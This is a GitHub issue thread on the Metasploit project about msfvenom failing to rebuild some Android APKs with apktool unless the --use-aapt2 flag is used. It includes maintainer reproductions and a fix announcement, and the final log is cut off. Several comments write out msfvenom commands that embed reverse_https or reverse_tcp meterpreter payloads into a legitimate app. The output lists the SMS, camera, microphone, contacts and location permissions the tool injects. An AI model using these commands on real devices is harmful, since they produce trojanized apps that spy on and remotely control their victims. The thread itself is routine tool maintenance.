### ISSUE TITLE
Msfvenom lacks the parameter --use-aapt2, to sucefully rebuild some apks with apktool

### ISSUE THREAD

**Issue by legilimency31** [rapid7/metasploit-framework#16152]
When using apktool, some apks will not be rebuilded without this parameter. And since metasploit uses apktool to rebuild, there is a lot of apks that cant be injected because of the lack of this parameter. A simple solution with a huge utility.

**Comment by gwillcox-r7** [comment]
Hi there @legilimency31 would you to be able to provide an example of such an APK? Not aware of any that have had injection issues that required this parameter in the past so if we can have some more information to replicate the issue, I'd be happy to look into adding this support.

**Comment by gwillcox-r7** [comment]
Can confirm original issue of not working on missing flag happens:

```
 ~/Downloads  apktool d cuarentena-android.apk                             ✔ │ 3.0.2 Ruby 
I: Using Apktool 2.5.0 on cuarentena-android.apk
I: Loading resource table...
I: Decoding AndroidManifest.xml with resources...
I: Loading resource table from file: /home/gwillcox/.local/share/apktool/framework/1.apk
I: Renamed manifest package found! Replacing com.mvolution.cuarentena2 with com.godot.game
I: Decoding file-resources...
I: Decoding values */* XMLs...
I: Baksmaling classes.dex...
I: Copying assets and libs...
I: Copying unknown files...
I: Copying original files...
 ~/Downloads  apktool b cuarentena-android -o new_test.apk            ✔ │ 6s │ 3.0.2 Ruby 
I: Using Apktool 2.5.0
I: Checking whether sources has changed...
I: Smaling smali folder into classes.dex...
I: Checking whether resources has changed...
I: Building resources...
W: /home/gwillcox/Downloads/cuarentena-android/AndroidManifest.xml:18: Tag <uses-permission> missing required attribute name.
brut.androlib.AndrolibException: brut.common.BrutException: could not exec (exit code = 1): [/tmp/brut_util_Jar_148051836021342779912672648565745485343.tmp, p, --forced-package-id, 127, --min-sdk-version, 18, --target-sdk-version, 29, --rename-manifest-package, com.mvolution.cuarentena2, --version-code, 158, --version-name, 1.4.158, --no-version-vectors, -F, /tmp/APKTOOL12805036625523947077.tmp, -e, /tmp/APKTOOL2417174454734663831.tmp, -0, arsc, -I, /home/gwillcox/.local/share/apktool/framework/1.apk, -S, /home/gwillcox/Downloads/cuarentena-android/res, -M, /home/gwillcox/Downloads/cuarentena-android/AndroidManifest.xml]
 ~/Downloads      
```

Using the flag `--use-aapt2` seems to fix this as mentioned:

```
 ~/Downloads  apktool b --use-aapt2 cuarentena-android -o new_test.apk
I: Using Apktool 2.5.0
I: Checking whether sources has changed...
I: Checking whether resources has changed...
I: Building resources...
I: Copying libs... (/lib)
I: Copying libs... (/kotlin)
I: Building apk file...
I: Copying unknown files/dir...
I: Built apk...
 ~/Downloads  file new_test.apk                                       ✔ │ 8s │ 3.0.2 Ruby 
new_test.apk: Zip archive data, at least v2.0 to extract, compression method=deflate
 ~/Downloads      
```

No confirmation on if it is a valid APK since I don't have a test device to use for this purpose.

**Comment by gwillcox-r7** [comment]
Confirmed the issue occurs:

```
 ~/git/metasploit-framework │ master ?13  ./msfvenom -x ~/Downloads/cuarentena-android.apk -p android/meterpreter/reverse_https lhost=192.168.1.1 lport=8080 -o embedded.apk
Using APK template: /home/gwillcox/Downloads/cuarentena-android.apk
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
[*] Creating signing key and keystore..
[*] Decompiling original APK..
[*] Decompiling payload APK..
[*] Locating hook point..
[*] Adding payload as package com.godot.game.vdrac
[*] Loading /tmp/d20220215-89899-nletaf/original/smali/com/godot/game/GodotApp.smali and injecting payload..
[*] Poisoning the manifest with meterpreter permissions..
[*] Adding <uses-permission android:name="android.permission.CHANGE_WIFI_STATE"/>
[*] Adding <uses-permission android:name="android.permission.ACCESS_WIFI_STATE"/>
[*] Adding <uses-permission android:name="android.permission.READ_SMS"/>
[*] Adding <uses-permission android:name="android.permission.RECORD_AUDIO"/>
[*] Adding <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
[*] Adding <uses-permission android:name="android.permission.SET_WALLPAPER"/>
[*] Adding <uses-permission android:name="android.permission.READ_CALL_LOG"/>
[*] Adding <uses-permission android:name="android.permission.WAKE_LOCK"/>
[*] Adding <uses-permission android:name="android.permission.WRITE_CALL_LOG"/>
[*] Adding <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
[*] Adding <uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION"/>
[*] Adding <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
[*] Adding <uses-permission android:name="android.permission.RECORD_AUDIO"/>
[*] Adding <uses-permission android:name="android.permission.RECEIVE_SMS"/>
[*] Adding <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>
[*] Adding <uses-permission android:name="android.permission.SEND_SMS"/>
[*] Adding <uses-permission android:name="android.permission.WRITE_CONTACTS"/>
[*] Adding <uses-permission android:name="android.permission.CAMERA"/>
[*] Adding <uses-permission android:name="android.permission.CALL_PHONE"/>
[*] Adding <uses-permission android:name="android.permission.READ_CONTACTS"/>
[*] Adding <uses-permission android:name="android.permission.WRITE_SETTINGS"/>
[*] Adding <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
[*] Rebuilding apk with meterpreter injection as /tmp/d20220215-89899-nletaf/output.apk
[-] I: Using Apktool 2.5.0
I: Checking whether sources has changed...
I: Smaling smali folder into classes.dex...
I: Checking whether resources has changed...
I: Building resources...
W: /tmp/d20220215-89899-nletaf/original/AndroidManifest.xml:23: Tag <uses-permission> missing required attribute name.
brut.androlib.AndrolibException: brut.common.BrutException: could not exec (exit code = 1): [/tmp/brut_util_Jar_144822834331190359356815149679196299940.tmp, p, --forced-package-id, 127, --min-sdk-version, 18, --target-sdk-version, 29, --rename-manifest-package, com.mvolution.cuarentena2, --version-code, 158, --version-name, 1.4.158, --no-version-vectors, -F, /tmp/APKTOOL8326467714552978369.tmp, -e, /tmp/APKTOOL7942321272079742393.tmp, -0, arsc, -I, /home/gwillcox/.local/share/apktool/framework/1.apk, -S, /tmp/d20220215-89899-nletaf/original/res, -M, /tmp/d20220215-89899-nletaf/original/AndroidManifest.xml]
Error: Unable to rebuild apk with apktool
 ~/git/metasploit-framework │ master ?13                           2 х │ 26s │ 3.0.2 Ruby 
```

**Comment by gwillcox-r7** [comment]
@legilimency31 Note that in your example your doing some very odd stuff like specifying an encoder with `-e x86/shikata_ga_nai`. This makes no sense as the target doesn't support the x86 platform. Its running Java, not native x86 code, and Android phones are mostly ARM devices anyway which means even if it wasn't running Java, there is still no way this would make sense since the phone would essentially interpret it as junk and say this is an invalid program.

Also your flags `-i 11 -f c -e x86/shikata_ga_nai` make no sense. Why are you outputting it as a C file to a APK? That makes no sense at all.

This goes back to comments other people have made (I read through some of your other issues in other projects) whereby they note that even if you were to recompile this APK, that doesn't mean the resulting program would run.

With all that being said I do think there might be a potential issue here still given the above info, I just  want to make you aware though that even if we were to fix the root issue, the flags you are providing as it stands now would still result in errors due to you trying to mix various formats together that are incompatible when generating the resulting EXE.

**Comment by legilimency31** [comment]
> @legilimency31 Note that in your example your doing some very odd stuff like specifying an encoder with `-e x86/shikata_ga_nai`. This makes no sense as the target doesn't support the x86 platform. Its running Java, not native x86 code, and Android phones are mostly ARM devices anyway which means even if it wasn't running Java, there is still no way this would make sense since the phone would essentially interpret it as junk and say this is an invalid program.
> 
> Also your flags `-i 11 -f c -e x86/shikata_ga_nai` make no sense. Why are you outputting it as a C file to a APK? That makes no sense at all.
> 
> This goes back to comments other people have made (I read through some of your other issues in other projects) whereby they note that even if you were to recompile this APK, that doesn't mean the resulting program would run.
> 
> With all that being said I do think there might be a potential issue here still given the above info, I just want to make you aware though that even if we were to fix the root issue, the flags you are providing as it stands now would still result in errors due to you trying to mix various formats together that are incompatible when generating the resulting EXE.

Thanks for the heads up ! It makes sense, i tried that same exemple, these same flags, on a few apks, some worked on the device, some dont.

**Comment by bcoles** [comment]
>i tried that same exemple, these same flags, on a few apks, some worked on the device, some dont.

Unfortunately resolving this issue is unlikely to be as easy as slapping the `--use-aapt2` argument on the rebuild command.

Using this flag does allow the APK to be rebuilt in instances where it currently fails, but the injected payload fails to execute. For example, the `cuarentena-android.apk` linked above does rebuild correctly with this flag, but the injected payload does not execute. I have not investigated further and I'm not sure if this is due to tamper protection or if there's something else going on.

Do you have a list of URLs for APKs which did and did not work?

Also, using this flag may break older APKs and/or break on older devices which do not support AAPT2.

* https://developer.android.com/studio/command-line/aapt2#aapt2_changes

In instances where we're using an existing APK template file, it may be possible to determine whether the APK was built with AAPT2 and add the `--use-aapt2` flag. This seems like the best approach if we can find a reliable detection method.

In instances where we're building an APK from scratch, we should probably expose a payload module option for using AAPT2, set to true by default.

**Comment by cybercortar** [comment]
/usr/bin/msfvenom -p android/meterpreter/reverse_tcp LHOST=***** LPORT=443 R > /home/kali/Desktop/payload.apk

**Comment by bcoles** [comment]
Fixed in #16340 (pending merge).

> In instances where we're building an APK from scratch, we should probably expose a payload module option for using AAPT2, set to true by default.

I'm leaving this as a problem for another day or another person, as this issue was specifically about rebuilding template APK files with `apktool`.

**Comment by balram8264** [comment]
Pl. Fix this error 

[*] Rebuilding apk with meterpreter injection as /sdcard/Download/d20240522-5361-uqsy7b/output.apk
[-] I: Using Apktool 2.9.3
I: Checking whether sources has changed...
I: Smaling smali folder into classes.dex...
I: Checking whether sources has changed...
I: Smaling smali_classes2 folder into classes2.dex...
I: Checking whether sources has changed...
I: Smaling smali_classes3 folder into classes3.dex...
I: Checking whether sources has changed...
I: Smaling smali_classes4 folder into classes4.dex...
I: Checking whether sources has changed...
I: Smaling smali_classes5 folder into classes5.dex...
I: Checking whether sources has changed...
I: Smaling smali_classes6 folder into classes6.dex...
I: Checking whether sources has changed...
I: Smaling smali_classes7 folder into classes7.dex...
I: Checking whether resources has changed...
I: Building resources...
brut.androlib.exceptions.AndrolibException: brut.common.BrutException: could not exec (exit code = 2): [/tmp/brut_util_Jar_148434001129956137276594280477331056658.tmp, compile, --dir, /sdcard/Download/d20240522-5361-uqsy7b/original/res, --legacy, -o, /sdcard/Download/d20240522-5361-uqsy7b/original/build/resources.zip]
W: /tmp/brut_util_Jar_148434001129956137276594280477331056658.tmp: 4: Syntax error: Unterminated quoted string
[*] Unable to rebuild apk. Trying rebuild with AAPT2..
[-] I: Using Apktool 2.9.3
I: Checking whether sources has changed...
I: Checking whether sources has changed...
I: Checking whether sources has changed...
I: Checking whether sources has changed...
I: Checking whether sources has changed...
I: Checking whether sources has changed...
I: Checking whether sources has changed...
I: Checking whether resources has changed...
I: Building resources...
brut.androlib.exceptions.AndrolibException: brut.common.BrutException: could not exec (exit code = 2): [/tmp/brut_util_Jar_39248851329314648814460777854991054716.tmp,
